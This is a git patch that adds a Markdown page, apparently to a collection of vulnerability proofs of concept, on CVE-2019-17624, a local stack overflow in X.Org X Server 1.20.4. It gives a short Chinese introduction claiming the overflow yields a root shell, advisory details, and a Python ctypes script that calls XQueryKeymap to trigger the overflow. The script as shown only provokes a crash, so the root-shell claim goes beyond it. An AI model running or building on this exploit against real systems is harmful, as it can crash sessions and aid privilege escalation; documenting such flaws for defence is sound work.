From 87f5a9700ff4b9203ae15adbbeb9df25a289840c Mon Sep 17 00:00:00 2001
From: mr-xn <mrxn.net@gmail.com>
Date: Wed, 16 Oct 2019 23:18:51 +0800
Subject: [PATCH] =?UTF-8?q?add=20CVE-2019-17624-X.Org=20X=20Server=201.20.?=
 =?UTF-8?q?4=20-=20Local=20Stack=20Overflow-Linux=E5=9B=BE=E5=BD=A2?=
 =?UTF-8?q?=E7=95=8C=E9=9D=A2X=20Server=E6=9C=AC=E5=9C=B0=E6=A0=88?=
 =?UTF-8?q?=E6=BA=A2=E5=87=BAPOC?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 ...flow-Linux图形界面X Server本地栈溢出POC.md | 63 +++++++++++++++++++
 1 file changed, 63 insertions(+)
 create mode 100644 CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC.md

diff --git a/CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC.md b/CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC.md
new file mode 100644
index 0000000..1239516
--- /dev/null
+++ b/CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC.md	
@@ -0,0 +1,63 @@
+## CVE-2019-17624-X.Org X Server 1.20.4 - Local Stack Overflow-Linux图形界面X Server本地栈溢出POC
+
+**0x1 简单介绍**  
+
+X Server 是绝大对数[Linux](https://mrxn.net/tag/Linux)发行版和Unix系统的基础图形界面程序，是系统标配。而此程序也是以Root权限启动的，因而成功溢出它而获得的[shell](https://mrxn.net/tag/shell)，也是root权限。  
+
+**0x2 漏洞相关信息**  
+
+```
+# 时间: 2019-10-16
+ 
+# 作者: Marcelo Vázquez (s4vitar)
+ 
+# 厂商: https://www.x.org/
+ 
+# 版本: <= 1.20.4
+ 
+# 测试平台: Linux
+ 
+# CVE: CVE-2019-17624
+
+```
+
+ **0x3 POC**   
+
+```python
+#!/usr/bin/python
+#coding: utf-8
+ 
+# ************************************************************************
+# *                Author: Marcelo Vázquez (aka s4vitar)                 *
+# *      X.Org X Server 1.20.4 / X Protocol Version 11 (Stack Overflow)  *
+# ************************************************************************
+ 
+import sys, time
+import ctypes as ct
+ 
+from ctypes import cast
+from ctypes.util import find_library
+ 
+def access_violation(x11, current_display):
+  keyboard = (ct.c_char * 1000)()
+  x11.XQueryKeymap(current_display, keyboard)
+ 
+if __name__ == '__main__':
+ 
+  print "\n[*] Loading x11...\n"
+  time.sleep(2)
+ 
+  x11 = ct.cdll.LoadLibrary(find_library("X11"))
+  current_display = x11.XOpenDisplay(None)
+ 
+  print "[*] Exploiting...\n"
+  time.sleep(1)
+ 
+  try:
+    access_violation(x11, current_display)
+ 
+  except:
+    print "\nError...\n"
+    sys.exit(1)
+```
+